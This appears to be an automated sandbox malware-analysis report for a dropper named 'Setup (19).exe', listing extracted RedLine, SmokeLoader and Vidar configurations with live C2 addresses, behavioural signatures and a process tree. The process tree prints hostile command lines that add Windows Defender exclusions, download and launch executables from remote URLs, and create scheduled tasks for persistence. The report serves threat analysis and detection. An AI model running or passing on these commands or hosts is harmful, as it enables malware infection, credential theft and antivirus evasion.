Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    1807s
  • max time network
    1823s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    21-08-2021 10:21

General

  • Target

    Setup (19).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://dl.uploadgram.me/6120bc6269f31h?raw

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://dl.uploadgram.me/6120bcfeb5393h?raw

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://dl.uploadgram.me/6120c8f91373ch?raw

Extracted

Family

redline

Botnet

Second_7.5K

C2

45.14.49.200:27625

Extracted

Family

redline

Botnet

www

C2

185.204.109.146:54891

Extracted

Family

redline

Botnet

dibild

C2

135.148.139.222:33569

Extracted

Family

redline

Botnet

19.08

C2

95.181.172.100:6795

Extracted

Family

smokeloader

Version

2020

C2

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

@Gerhdhd

C2

46.8.19.177:41228

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 11 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • Blocklisted process makes network request 7 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 11 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 12 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 12 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 26 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 11 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 30 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 29 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 17 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 32 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 23 IoCs
  • Suspicious behavior: SetClipboardViewer 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 62 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
    1⤵
      PID:1232
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s SENS
      1⤵
        PID:1408
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
        1⤵
          PID:1820
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Themes
          1⤵
            PID:1192
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
            1⤵
              PID:2492
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
              1⤵
                PID:2448
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                1⤵
                  PID:1056
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                  1⤵
                  • Drops file in System32 directory
                  PID:788
                  • C:\Users\Admin\AppData\Roaming\cfsafjc
                    C:\Users\Admin\AppData\Roaming\cfsafjc
                    2⤵
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: MapViewOfSection
                    PID:6596
                  • C:\Users\Admin\AppData\Roaming\cfsafjc
                    C:\Users\Admin\AppData\Roaming\cfsafjc
                    2⤵
                    • Suspicious behavior: MapViewOfSection
                    PID:7324
                  • C:\Users\Admin\AppData\Roaming\cfsafjc
                    C:\Users\Admin\AppData\Roaming\cfsafjc
                    2⤵
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: MapViewOfSection
                    PID:3420
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Browser
                  1⤵
                    PID:2836
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                    1⤵
                      PID:2764
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                      1⤵
                        PID:2708
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                        1⤵
                          PID:1004
                        • C:\Users\Admin\AppData\Local\Temp\Setup (19).exe
                          "C:\Users\Admin\AppData\Local\Temp\Setup (19).exe"
                          1⤵
                          • Checks computer location settings
                          • Modifies system certificate store
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of WriteProcessMemory
                          PID:3128
                          • C:\Users\Admin\Documents\tfmFgK9w71TpTpJqhUlQRQle.exe
                            "C:\Users\Admin\Documents\tfmFgK9w71TpTpJqhUlQRQle.exe"
                            2⤵
                            • Executes dropped EXE
                            PID:3676
                            • C:\Users\Admin\Documents\tfmFgK9w71TpTpJqhUlQRQle.exe
                              C:\Users\Admin\Documents\tfmFgK9w71TpTpJqhUlQRQle.exe
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4360
                          • C:\Users\Admin\Documents\uwtBY5_fgfWhsQUfzRGn9ts8.exe
                            "C:\Users\Admin\Documents\uwtBY5_fgfWhsQUfzRGn9ts8.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4052
                          • C:\Users\Admin\Documents\MCy69zYoC6A83qNV7PWC49cY.exe
                            "C:\Users\Admin\Documents\MCy69zYoC6A83qNV7PWC49cY.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Suspicious use of WriteProcessMemory
                            PID:2264
                            • C:\Users\Admin\Documents\MCy69zYoC6A83qNV7PWC49cY.exe
                              C:\Users\Admin\Documents\MCy69zYoC6A83qNV7PWC49cY.exe
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4380
                          • C:\Users\Admin\Documents\WgAQMBbuvnZa4Uim1cKe4vXj.exe
                            "C:\Users\Admin\Documents\WgAQMBbuvnZa4Uim1cKe4vXj.exe"
                            2⤵
                            • Executes dropped EXE
                            • Checks BIOS information in registry
                            • Checks whether UAC is enabled
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3336
                          • C:\Users\Admin\Documents\4g9oUp8jAFefeykFTkbWSBy4.exe
                            "C:\Users\Admin\Documents\4g9oUp8jAFefeykFTkbWSBy4.exe"
                            2⤵
                            • Executes dropped EXE
                            PID:4044
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', '%Temp%\\installer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', '%AppData%\\RuntimeBroker.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', '%Temp%\\launcher.exe') & powershell Start-Process -FilePath '%Temp%\\installer.exe' & powershell Start-Process -FilePath '%AppData%\\RuntimeBroker.exe' & powershell Start-Process -FilePath '%Temp%\\launcher.exe' & exit
                              3⤵
                                PID:4824
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                  4⤵
                                    PID:4428
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                    4⤵
                                      PID:7116
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                      4⤵
                                        PID:6724
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                        4⤵
                                          PID:7876
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', 'C:\Users\Admin\AppData\Local\Temp\\installer.exe')
                                          4⤵
                                            PID:9132
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe')
                                            4⤵
                                            • Blocklisted process makes network request
                                            PID:5372
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe')
                                            4⤵
                                              PID:9172
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\installer.exe'
                                              4⤵
                                                PID:6812
                                                • C:\Users\Admin\AppData\Local\Temp\installer.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                  5⤵
                                                    PID:1868
                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                      "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                      6⤵
                                                        PID:2300
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                          7⤵
                                                            PID:388
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                            7⤵
                                                              PID:188
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                              7⤵
                                                                PID:1328
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                7⤵
                                                                  PID:8972
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                                6⤵
                                                                  PID:8816
                                                                  • C:\Windows\System32\Conhost.exe
                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    7⤵
                                                                    • Drops file in Drivers directory
                                                                    • Executes dropped EXE
                                                                    • Adds Run key to start application
                                                                    • Drops file in Program Files directory
                                                                    PID:6276
                                                                  • C:\Users\Admin\AppData\Local\Temp\svchost32.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                                    7⤵
                                                                      PID:4932
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
                                                                        8⤵
                                                                          PID:5624
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
                                                                            9⤵
                                                                            • Creates scheduled task(s)
                                                                            PID:6944
                                                                        • C:\Windows\system32\services32.exe
                                                                          "C:\Windows\system32\services32.exe"
                                                                          8⤵
                                                                            PID:6860
                                                                            • C:\Windows\system32\cmd.exe
                                                                              "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                                              9⤵
                                                                                PID:9060
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                  10⤵
                                                                                    PID:8508
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                    10⤵
                                                                                      PID:8828
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                      10⤵
                                                                                        PID:8636
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                                        10⤵
                                                                                          PID:8840
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
                                                                                        9⤵
                                                                                          PID:9156
                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            10⤵
                                                                                            • Suspicious use of SendNotifyMessage
                                                                                            PID:8544
                                                                                          • C:\Users\Admin\AppData\Local\Temp\svchost32.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
                                                                                            10⤵
                                                                                            • Drops file in System32 directory
                                                                                            PID:7556
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
                                                                                              11⤵
                                                                                              • Drops file in System32 directory
                                                                                              PID:4932
                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                12⤵
                                                                                                  PID:5624
                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                  schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
                                                                                                  12⤵
                                                                                                  • Creates scheduled task(s)
                                                                                                  PID:7744
                                                                                              • C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
                                                                                                "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
                                                                                                11⤵
                                                                                                  PID:7460
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
                                                                                                  11⤵
                                                                                                    PID:4156
                                                                                                    • C:\Windows\system32\choice.exe
                                                                                                      choice /C Y /N /D Y /T 3
                                                                                                      12⤵
                                                                                                        PID:4836
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
                                                                                                8⤵
                                                                                                  PID:6548
                                                                                                  • C:\Windows\system32\choice.exe
                                                                                                    choice /C Y /N /D Y /T 3
                                                                                                    9⤵
                                                                                                      PID:9168
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe'
                                                                                            4⤵
                                                                                              PID:7976
                                                                                              • C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
                                                                                                5⤵
                                                                                                • Adds Run key to start application
                                                                                                • Suspicious behavior: SetClipboardViewer
                                                                                                PID:8324
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe'
                                                                                              4⤵
                                                                                                PID:8504
                                                                                                • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\launcher.exe"
                                                                                                  5⤵
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  PID:8144
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                                                    "{path}"
                                                                                                    6⤵
                                                                                                      PID:1784
                                                                                            • C:\Users\Admin\Documents\IvXEuwW59N_cXWlDbgjIyNx7.exe
                                                                                              "C:\Users\Admin\Documents\IvXEuwW59N_cXWlDbgjIyNx7.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of SetThreadContext
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:2852
                                                                                              • C:\Users\Admin\Documents\IvXEuwW59N_cXWlDbgjIyNx7.exe
                                                                                                C:\Users\Admin\Documents\IvXEuwW59N_cXWlDbgjIyNx7.exe
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4388
                                                                                              • C:\Users\Admin\Documents\IvXEuwW59N_cXWlDbgjIyNx7.exe
                                                                                                C:\Users\Admin\Documents\IvXEuwW59N_cXWlDbgjIyNx7.exe
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:4564
                                                                                            • C:\Users\Admin\Documents\gdCjIZ3vQLrTFWKdOezjL1wn.exe
                                                                                              "C:\Users\Admin\Documents\gdCjIZ3vQLrTFWKdOezjL1wn.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of SetThreadContext
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:2152
                                                                                              • C:\Users\Admin\Documents\gdCjIZ3vQLrTFWKdOezjL1wn.exe
                                                                                                C:\Users\Admin\Documents\gdCjIZ3vQLrTFWKdOezjL1wn.exe
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:4396
                                                                                            • C:\Users\Admin\Documents\Jehn52WtbMKZ9kxobh4J4A03.exe
                                                                                              "C:\Users\Admin\Documents\Jehn52WtbMKZ9kxobh4J4A03.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:1184
                                                                                            • C:\Users\Admin\Documents\Bl4aeKqISbgmfj5TPTrnlG3E.exe
                                                                                              "C:\Users\Admin\Documents\Bl4aeKqISbgmfj5TPTrnlG3E.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:2160
                                                                                              • C:\Users\Admin\Documents\Bl4aeKqISbgmfj5TPTrnlG3E.exe
                                                                                                "C:\Users\Admin\Documents\Bl4aeKqISbgmfj5TPTrnlG3E.exe" -q
                                                                                                3⤵
                                                                                                  PID:5032
                                                                                              • C:\Users\Admin\Documents\0NKIqxJZOxkSqcoqQk5gff41.exe
                                                                                                "C:\Users\Admin\Documents\0NKIqxJZOxkSqcoqQk5gff41.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Checks BIOS information in registry
                                                                                                • Checks whether UAC is enabled
                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:2136
                                                                                              • C:\Users\Admin\Documents\H_GAN4lymZYNIe2SYb1o6PjL.exe
                                                                                                "C:\Users\Admin\Documents\H_GAN4lymZYNIe2SYb1o6PjL.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Checks SCSI registry key(s)
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                PID:3820
                                                                                              • C:\Users\Admin\Documents\9V6mnXHdynq1s7PpT244URZa.exe
                                                                                                "C:\Users\Admin\Documents\9V6mnXHdynq1s7PpT244URZa.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Checks BIOS information in registry
                                                                                                • Checks whether UAC is enabled
                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:3492
                                                                                              • C:\Users\Admin\Documents\qhRWdCBRrOEeIDbo7QDZo256.exe
                                                                                                "C:\Users\Admin\Documents\qhRWdCBRrOEeIDbo7QDZo256.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:2624
                                                                                                • C:\Users\Admin\AppData\Roaming\4726380.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\4726380.exe"
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:3572
                                                                                                • C:\Users\Admin\AppData\Roaming\7300426.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\7300426.exe"
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Adds Run key to start application
                                                                                                  PID:1996
                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                    4⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4716
                                                                                                • C:\Users\Admin\AppData\Roaming\2310645.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\2310645.exe"
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:4468
                                                                                              • C:\Users\Admin\Documents\oYJ4oarMVlCEKSuYDbZ6GPPw.exe
                                                                                                "C:\Users\Admin\Documents\oYJ4oarMVlCEKSuYDbZ6GPPw.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4028
                                                                                                • C:\Users\Admin\Documents\oYJ4oarMVlCEKSuYDbZ6GPPw.exe
                                                                                                  "C:\Users\Admin\Documents\oYJ4oarMVlCEKSuYDbZ6GPPw.exe"
                                                                                                  3⤵
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:8236
                                                                                              • C:\Users\Admin\Documents\Ls6HCRy7CjYIm6XRO_DMyU5M.exe
                                                                                                "C:\Users\Admin\Documents\Ls6HCRy7CjYIm6XRO_DMyU5M.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                PID:508
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 760
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:5000
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 784
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  PID:3260
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 820
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  PID:4080
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 856
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:2032
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 956
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  PID:5176
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 984
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  PID:5484
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 1020
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  PID:5756
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 1456
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  PID:5940
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 1496
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  PID:5208
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 1500
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  PID:6116
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 1688
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  PID:6136
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 1488
                                                                                                  3⤵
                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                  • Program crash
                                                                                                  PID:6064
                                                                                              • C:\Users\Admin\Documents\MWJd3mPPIlWyLa2RpIzVqQrH.exe
                                                                                                "C:\Users\Admin\Documents\MWJd3mPPIlWyLa2RpIzVqQrH.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
